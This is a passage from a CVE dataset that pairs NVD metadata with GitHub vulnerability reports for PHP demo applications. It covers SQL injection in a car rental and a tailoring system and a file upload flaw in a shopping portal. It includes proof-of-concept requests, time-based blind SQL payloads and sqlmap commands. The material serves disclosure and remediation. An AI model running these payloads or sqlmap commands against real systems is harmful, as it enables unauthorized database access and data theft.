python sqlmap.py -r 1.txt -p phonenumber –current-db --batch
python sqlmap.py -r 1.txt -p address –current-db --batch
python sqlmap.py -r 1.txt -p fullname –current-db --batch
python sqlmap.py -r 1.txt -p comment –current-db --batch
python sqlmap.py -r 1.txt -p city –current-db --batch
python sqlmap.py -r 1.txt -p email –current-db --batch
```
<img width="491" alt="3" src="https://github.com/magic2353112890/photo/blob/main/5-3.png?raw=true" />
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 customeredit.php POST parameter SQL injection | https://api.github.com/repos/magic2353112890/cve/issues/5/comments | 0 | 2025-01-23T09:15:17Z | 2025-01-23T09:16:01Z | https://github.com/magic2353112890/cve/issues/5 | 2,806,348,566 | 5 | 6,527 |
CVE-2025-0874 | 2025-01-30T18:15:33.753 | A vulnerability, which was classified as critical, has been found in code-projects Simple Plugins Car Rental Management 1.0. Affected by this issue is some unknown functionality of the file /admin/approve.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://code-projects.org/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/magic2353112890/cve/issues/8"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.294068"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.294068"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.488538"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fabianros:simple_car_rental_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D80D0581-09FD-4CE1-9327-CF580DF49354",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/magic2353112890/cve/issues/8 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"magic2353112890",
"cve"
] | > # code-projects Simple Car Rental System In PHP With Source Code v1.0 approve.php SQL injection
> # usernameOF AFFECTED PRODUCT(S)
> * Restaurant Order System In PHP With Source Code
>
> ## Vendor Homepage
> * https://code-projects.org/simple-car-rental-system-in-php-with-source-code/
>
> # AFFECTED AND/OR FIXED VERSION(S)
> ## submitter
> * lyp123
>
> ## Vulnerable File
> * approve.php
>
> ## VERSION(S)
> * V1.0
>
> ## Software Link
> * https://download.code-projects.org/details/d25c80bc-0c8c-402c-8902-295ab6ff0f98
>
> # PROBLEM TYPE
> ## Vulnerability Type
> * SQL injection
>
> ## Root Cause
> * A SQL injection vulnerability was found in the 'approve.php' file of the 'Restaurant Order System In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
><img width="735" alt="1" src="https://github.com/magic2353112890/photo/blob/main/8-1.png?raw=true" />
>
> ## Impact
> * Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
>
> # DESCRIPTION
> * Due to insufficient user input verification for the "id" parameter, a serious SQL injection vulnerability has been discovered in the "Simple Car Rental System In PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
>
> # No login verification required
> # Vulnerability details and POC
> ```
> GET /SimpleCar%20Rental%20PHP/car_rental/admin/approve.php?id=2 HTTP/1.1
> Host: > 27.0.0.>
> sec-ch-ua:
> sec-ch-ua-mobile: ?0
> sec-ch-ua-platform: ""
> Upgrade-Insecure-Requests: >
> User-Agent: Mozilla/5.0 (Windows NT > 0.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/> > 5.0.5790.> 7> Safari/537.36
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
> Sec-Fetch-Site: same-origin
> Sec-Fetch-Mode: navigate
> Sec-Fetch-User: ?>
> Sec-Fetch-Dest: document
> Referer: http://> 27.0.0.> /SimpleCar%20Rental%20PHP/car_rental/admin/client_requests.php
> Accept-Encoding: gzip, deflate
> Accept-Language: zh-CN,zh;q=0.9
> Cookie: PHPSESSID=vm9vv23fnms2arsbd8cjupnjb4
> Connection: close
> ```
>
> ## Vulnerability type:
> * time-based blind
>
> ## Vulnerability location:
> * 'id' parameter
>
> ## Payload:
> ```
> Parameter: id (GET)
> Type: time-based blind
> Title: MySQL >= 5.0.> 2 AND time-based blind (query SLEEP)
> Payload: id=2' AND (SELECT 3792 FROM (SELECT(SLEEP(5)))obgT) AND 'dlaR'='dlaR
> ```
>
> <img width="735" alt="1" src="https://github.com/magic2353112890/photo/blob/main/8-2.png?raw=true" />
>
> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
> sqlmap.py -r 1.txt --batch --current-db
> <img width="735" alt="1" src="https://github.com/magic2353112890/photo/blob/main/8-3.png?raw=true" />
>
> # Suggested repair
> 1. **Use prepared statements and parameter binding:**
> Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
> 2. **Input validation and filtering:**
> Strictly validate and filter user input data to ensure it conforms to the expected format.
> 3. **Minimize database user permissions:**
> Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
> 4. **Regular security audits:**
> Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
| code-projects Simple Car Rental System In PHP With Source Code v1.0 approve.php SQL injection | https://api.github.com/repos/magic2353112890/cve/issues/8/comments | 0 | 2025-01-24T07:22:59Z | 2025-01-24T07:24:54Z | https://github.com/magic2353112890/cve/issues/8 | 2,808,718,469 | 8 | 6,528 |
CVE-2025-0943 | 2025-02-01T11:15:08.457 | A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file deldoc.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/magic2353112890/cve/issues/7"
},
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://itsourcecode.com/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.294298"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.294298"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.488498"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:angeljudesuarez:tailoring_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6D27827-5554-4FAB-8460-52599930F4FF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/magic2353112890/cve/issues/7 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"magic2353112890",
"cve"
] | # Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 Multiple php files found GET type SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Tailoring Management System Project In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/tailoring-management-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ lyp123
## Vulnerable File
+ deldoc.php, customerview.php, typedelete.php, templatedelete.php, expview.php, incview.php, partview.php, staffview.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/04/tailoring-management-system-project-in-php-with-source-code.zip
# PROBLEM TYPE
## Vulnerability Type
+ GET type SQL injection
## Root Cause
+ A GET SQL injection vulnerability was found in multiple PHP files in the Tailoring Management System Project In PHP with Source Code project. The reason for this issue is that an attacker injects malicious code from the parameter "id" or "expid" or "incid" or "typeid" or "staffid" and uses it directly in SQL queries without proper sanitization or validation. This allows an attacker to forge input values to manipulate SQL queries and perform unauthorized actions.
<img width="735" alt="1" src="https://github.com/magic2353112890/photo/blob/main/7-1-2.png?raw=true" />
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for "id" or "expid" or "incid" or "typeid" or "staffid" parameter, a serious SQL injection vulnerability has been discovered in the "Tailoring Management System Project in PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
```
GET /tailor/deldoc.php?id=1 HTTP/1.1
Host: 127.0.0.1
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=dm0v2m9bskme1h59n1vd9jk6n3
Connection: close
```
## Vulnerability type:
+ time-based blind
## Vulnerability location:
+ "id" or "expid" or "incid" or "typeid" or "staffid" parameter
## Payload:
```
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8695 FROM (SELECT(SLEEP(5)))MgIe) AND 'kaZT'='kaZT
Parameter: expid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: expid=1' AND (SELECT 3590 FROM (SELECT(SLEEP(5)))alqt) AND 'NnDu'='NnDu
Parameter: incid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: incid=1' AND (SELECT 1197 FROM (SELECT(SLEEP(5)))WCAk) AND 'zWDb'='zWDb
Parameter: typeid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: typeid=1' AND (SELECT 7717 FROM (SELECT(SLEEP(5)))RUpZ) AND 'XYNO'='XYNO
Parameter: staffid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: staffid=1' AND (SELECT 3951 FROM (SELECT(SLEEP(5)))Asyc) AND 'eqma'='eqma
```
<img width="656" alt="2" src="https://github.com/magic2353112890/photo/blob/main/7-1-1.png?raw=true" />
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap.py -u http://x.x.x.x/tailor/deldoc.php?id=1 --current-db --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/customerview.php?id=1 --current-db --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/typedelete.php?id=100 --current-db --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/templatedelete.php?id=100 --current-db --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/expview.php?expid=1 --current-db --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/incview.php?incid=1 --current-db --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/partview.php?typeid=1 --current-db --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/staffview.php?staffid=1 --current-db --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
```
<img width="491" alt="3" src="https://github.com/magic2353112890/photo/blob/main/7-3.png?raw=true" />
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 Multiple php files found GET type SQL injection | https://api.github.com/repos/magic2353112890/cve/issues/7/comments | 0 | 2025-01-24T06:07:35Z | 2025-01-24T06:09:28Z | https://github.com/magic2353112890/cve/issues/7 | 2,808,585,275 | 7 | 6,529 |
CVE-2024-57668 | 2025-02-06T19:15:19.643 | In Code-projects Shopping Portal v1.0, the insert-product.php page has an arbitrary file upload vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://code-projects.org/shopping-portal-using-php-source-code/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/passevery/vul/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fabianros:shopping_portal:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "38C7B4D7-3017-4092-879F-32794D4B04F1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/passevery/vul/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"passevery",
"vul"
] | # usernameOF AFFECTED PRODUCT(S)
* SHOPPING PORTAL USING PHP WITH SOURCE CODE
## Vendor Homepage
* https://code-projects.org/shopping-portal-using-php-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
* GuoJialiang
## Vulnerable File
* insert-product.php
## VERSION(S)
* v1.0
## Software Link
* https://download.code-projects.org/details/b80452f3-1d7f-4c35-9b26-c38ec9f9fe37
# PROBLEM TYPE
## Vulnerability Type
* Arbitrary file upload vulnerability
## Root Cause
* An arbitrary file upload vulnerability was found in the "insert-product.php" file of the "SHOPPING PORTAL USING PHP WITH SOURCE CODE" project. The reason for this problem is that the attacker can upload any file at the image upload function point, and can upload php files and execute Trojans to obtain control rights of the server, and the system does not detect or limit the uploaded files. This allows the attacker to upload a Trojan file, which can cause the attacker to gain access to the server and cause the server to be compromised.

## Impact
* An arbitrary file upload vulnerability allows an attacker to upload arbitrary files, including Trojans. So that the attacker can obtain the privileges of the server and execute the command, causing great harm to the business and the server
# Login verification required
# DESCRIPTION
* Due to the lack of verification of the type and content of uploaded files, a serious SQL file upload vulnerability was found in "SHOPPING PORTAL USING PHP WITH SOURCE CODE", which allowed attackers to upload Trojan files. Therefore, the attacker can execute commands to gain server privileges. Immediate remedial action is required to secure the system and protect data integrity.
# Vulnerability details



* Trojan connection

* Command execution

## Vulnerability type:
* File Upload vulnerability
## Vulnerability location:
* "move uploaded file" function
# Suggested repair
1. Restrict file types and extensions: Only allow secure and critical file extensions required for business functionality. Create an allow list (whitelist) and a reject list (blacklist) to restrict file extensions that may be relevant for software execution, such as eliminating any extensions associated with executable files, or looking for double extensions that may escape via regular expression detection, such as.gif.doc
2. Verify file type: Don't just rely on the file extension or the "magic number" at the beginning of the file to verify the file type. Using Content Decondition and Reconstruction (CDR) technology, it is possible to identify the true file type and extension of the incoming file, which is achieved by examining the basic nature of the data
3. Change filename: Do not pass user-provided input (filename) to the filesystem API. Filename validation should limit file size, limit character length, and allow only certain characters. Change filenames to safe names whenever possible, or at least eliminate characters that might be used for directory traversal
4. Where to store files: If possible, store files on a different server. If that's not possible, store them outside the web root. Use an in-application handler that maps to the filename (someid -> file.ext) when the file needs to be publicly accessible.
| SHOPPING PORTAL USING PHP WITH SOURCE CODE has arbitrary file upload vulnerability | https://api.github.com/repos/passevery/vul/issues/1/comments | 0 | 2024-12-30T02:42:28Z | 2024-12-30T02:42:28Z | https://github.com/passevery/vul/issues/1 | 2,762,572,779 | 1 | 6,530 |
CVE-2025-1172 | 2025-02-11T04:15:08.800 | A vulnerability, which was classified as critical, has been found in 1000 Projects Bookstore Management System 1.0. Affected by this issue is some unknown functionality of the file addtocart.php. The manipulation of the argument bcid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://1000projects.org/"
},
{
"source": "cna@vuldb.com",
